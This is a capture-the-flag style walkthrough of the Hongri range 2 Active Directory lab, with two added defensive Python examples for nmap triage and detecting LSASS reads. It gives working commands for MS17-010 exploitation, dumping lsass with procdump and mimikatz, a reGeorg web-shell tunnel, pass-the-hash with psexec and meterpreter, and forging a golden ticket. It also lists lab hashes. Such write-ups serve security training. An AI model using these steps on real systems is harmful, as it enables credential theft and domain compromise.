Change your own network segment to 192.168.111.0.
This is the second Hongri (红日) range. The default password is 1qaz@WSX, and the web machine must first be restored to snapshot v1.3 before you can log in normally.
The administrator runs C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.bat
to start the web service.
The end goal is to take the domain controller and walk through a golden ticket once in practice.
Host discovery
arp-scan 192.168.111.0/24
192.168.111.80 192.168.111.201
Port scan
nmap -sV -A 192.168.111.80
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-10-20T09:57:12
|_Not valid after: 2049-10-20T09:57:12
|_ssl-date: 2021-12-16T07:35:45+00:00; +1s from scanner time.
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
| Product_Version: 6.1.7601
|_ System_Time: 2021-12-16T07:35:05+00:00
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2021-12-15T07:12:46
|_Not valid after: 2022-06-16T07:12:46
|_ssl-date: 2021-12-16T07:35:45+00:00; +1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h08m33s, deviation: 3h01m23s, median: 0s
| ms-sql-info:
| 192.168.111.80:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: WEB
| NetBIOS computer name: WEB\x00
| Domain name: de1ay.com
| Forest name: de1ay.com
| FQDN: WEB.de1ay.com
|_ System time: 2021-12-16T15:35:09+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-16T07:35:08
|_ start_date: 2019-10-08T03:17:01
The scan also gives the domain information.
Continue scanning SMB
nmap -p 139,445 --script=smb-vuln* -Pn 192.168.111.80
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
The host is affected by MS17-010, but on checking there are no usable named pipes, and switching the account to guest finds none either, so it looks hard to exploit.
Port 80 is a blank page; scanning turned up an asp_net directory, and scanning further under it found nothing.
Port 7001 is the WebLogic login page; trying the default credentials failed.
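Read from the defender's side, the scan output above is a remediation list. The following is an added example, not part of the original write-up: a small Python triage that parses nmap text like the above into open ports and severity-ranked hardening findings. The sample text is an abridged copy of the 192.168.111.80 output; the severity labels and remediation notes are the example's own.

```python
import re
# Constructed sample: an abridged copy of the nmap output shown above for 192.168.111.80.
SAMPLE_80 = """\
80/tcp open http Microsoft IIS httpd 7.5
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
3389/tcp open ssl/ms-wbt-server?
| Post-SP patches applied: false
|_ message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
| smb-vuln-ms17-010:
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
"""

SEVERITY = {"critical": 0, "high": 1, "medium": 2, "low": 3}
# (regex tested against one de-prefixed output line, severity, remediation note)
LINE_RULES = [
    (r"message_signing: disabled|Message signing enabled but not required", "high",
     "SMB signing not required: enforce 'Digitally sign communications (always)' on the server"),
    (r"Potentially risky methods: TRACE", "medium",
     "HTTP TRACE enabled on IIS: disable the TRACE/TRACK verbs"),
    (r"Post-SP patches applied: false", "high",
     "SQL Server 2008 R2 SP2 with no post-SP updates: apply cumulative updates or retire the instance"),
]
EXPOSURE_RULES = {1433: "MS SQL reachable from this network: restrict 1433/tcp to application hosts",
                  3389: "RDP reachable from this network: restrict 3389/tcp to jump hosts"}


def triage(host: str, text: str) -> dict:
    """Turn one host's nmap text into open ports plus a deduplicated, severity-sorted finding list."""
    open_ports, findings, current_vuln = [], set(), None
    for raw in text.splitlines():
        line = re.sub(r"^\|_?\s*", "", raw.strip())   # drop nmap's "| " / "|_" script-output prefix
        if m := re.match(r"^(\d+)/tcp\s+open\s+\S+", line):
            open_ports.append(int(m.group(1)))
        elif m := re.match(r"^smb-vuln-(\S+?):", line):
            current_vuln = m.group(1)                  # remember which smb-vuln-* block we are in
        elif line.startswith("State: VULNERABLE") and current_vuln:
            findings.add(("critical", f"{current_vuln}: SMBv1 RCE unpatched; install the update and disable SMBv1"))
            current_vuln = None
        else:
            for pattern, severity, note in LINE_RULES:
                if re.search(pattern, line):
                    findings.add((severity, note))
    findings.update(("medium", note) for port, note in EXPOSURE_RULES.items() if port in open_ports)
    return {"host": host, "open_ports": open_ports,
            "findings": sorted(findings, key=lambda f: (SEVERITY[f[0]], f[1]))}
```

The same function can be fed the 192.168.111.201 output, where the two SMB-signing lines again collapse into a single finding.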
dirsearch -u http://192.168.111.80:7001/
Confirmed affected by MS17-010.
WebLogic on port 7001: weblogicscan identifies the version as 10.3.6.
Two deserialization vulnerabilities are present: CVE-2019-2725 and CVE-2019-2890.
Port scan
nmap -sV -A -Pn 192.168.111.201
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: DE1AY)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: PC
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: PC.de1ay.com
| Product_Version: 6.1.7601
|_ System_Time: 2021-12-16T09:18:08+00:00
| ssl-cert: Subject: commonName=PC.de1ay.com
| Issuer: commonName=PC.de1ay.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-12-15T07:30:42
| Not valid after: 2022-06-16T07:30:42
| MD5: 8cca 80e5 dca8 5601 933f de66 9029 1dbf
|_SHA-1: b876 734e bf47 0147 1adf 63dc 6941 38de 2c98 1086
|_ssl-date: 2021-12-16T09:18:47+00:00; 0s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h35m59s, deviation: 3h34m38s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: PC
| NetBIOS computer name: PC\x00
| Domain name: de1ay.com
| Forest name: de1ay.com
| FQDN: PC.de1ay.com
|_ System time: 2021-12-16T17:18:10+08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-16T09:18:11
|_ start_date: 2021-12-16T07:30:38
nmap -p 139,445 --script=smb-vuln* -Pn 192.168.111.201
Also affected by MS17-010.
Nothing to lose: try MS17-010 with msf first, and if that fails go look at WebLogic.
Hm... and just like that, SYSTEM privileges.
# get rid of some of the garbled output (switch the console code page to UTF-8)
chcp 65001
# check the network segment
ipconfig
#
# list domain users
net user /domain
# locate the domain controller
net group "Domain Controllers" /domain
net time /domain
net time gives the domain controller's hostname; pinging it gives the IP 10.10.10.10.
Attempting to upload mimikatz failed.
tasklist shows zhudongfangyu, so 360 must be installed.
So upload procdump64.exe instead and dump lsass.
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
Open the dump locally with mimikatz
.\mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
In the output we can find the plaintext password 1qaz@WSX we already know, plus the hashes.
Set up a tunnel with neo-reGeorg
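The procdump dump of lsass.exe above is exactly the LSASS memory read that endpoint telemetry is tuned to catch. Added example, not from the write-up: a checker over constructed records in the shape of Sysmon Event ID 10 (ProcessAccess) that flags non-allowlisted processes opening lsass.exe with PROCESS_VM_READ; the allowlist, the file paths and the record values are assumptions.

```python
# Constructed records in the shape of Sysmon Event ID 10 (ProcessAccess). The procdump64.exe
# entry models the lsass dump taken above; the other three are routine system activity.
EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\procdump64.exe",   # constructed path
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
]

PROCESS_VM_READ = 0x0010   # the access right a memory-dumping tool cannot do without
# Hypothetical baseline of processes that legitimately open lsass.exe; tune it per environment.
ALLOWLIST = {r"c:\windows\system32\svchost.exe", r"c:\windows\system32\csrss.exe",
             r"c:\windows\system32\wininit.exe"}


def is_lsass_read(event: dict) -> bool:
    """True when a non-allowlisted process opened lsass.exe with memory-read rights."""
    if event.get("EventID") != 10:
        return False
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return False
    access = int(event["GrantedAccess"], 16)   # Sysmon logs the access mask as a hex string
    if not access & PROCESS_VM_READ:
        return False                            # query-only handles are routine noise
    return event["SourceImage"].lower() not in ALLOWLIST


def detect_lsass_access(events: list) -> list:
    """Return the events that indicate a credential-dump style read of LSASS memory."""
    return [e for e in events if is_lsass_read(e)]
```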
python3 neoreg.py generate -k wuerror
Then upload tunnel.aspx to the c:\inetpub\wwwroot\ directory and bring up the tunnel
sudo python3 neoreg.py -k wuerror -u http://192.168.111.80/tunnel.aspx
Switch to root and edit /etc/proxychains4.conf: proxy_dns must be commented out,
and the proxy address changed to 127.0.0.1:1080.
For the hashes, fill in Administrator's LM hash and NTLM hash
proxychains impacket-psexec -hashes f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24 Administrator@10.10.10.10 whoami
Executed successfully! SYSTEM privileges.
Swapping the IP for the .201 host works the same way.
In msfconsole:
use exploit/windows/smb/psexec
set proxies socks5:127.0.0.1:1080
set payload windows/meterpreter/bind_tcp
set RHOSTS 10.10.10.10
set SMBPASS f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24
set SMBUser Administrator
exploit
Looking back, unconstrained delegation must be present: the tickets exported by mimikatz include the domain admin administrator's TGT, so a pass-the-ticket attack could also be tried.
Continuing as above, dump lsass.dmp and download it locally. Get the krbtgt account's hash
sekurlsa::minidump dc-lsass.dmp
sekurlsa::Krbtgt
Pick the aes128 hash (the 256 one failed).
The domain SID comes from
sekurlsa::logonPasswords full
the administrator SID with the trailing RID removed.
impacket-ticketer -domain de1ay.com -domain-sid S-1-5-21-2756371121-2868759905-3853650604 -nthash 5eb13d2a0e1f4980c3e3810d5da3da4f stack2
After generating the ticket
export KRB5CCNAME=/home/wuerror/Downloads/temp/golden-ticket/stack2.ccache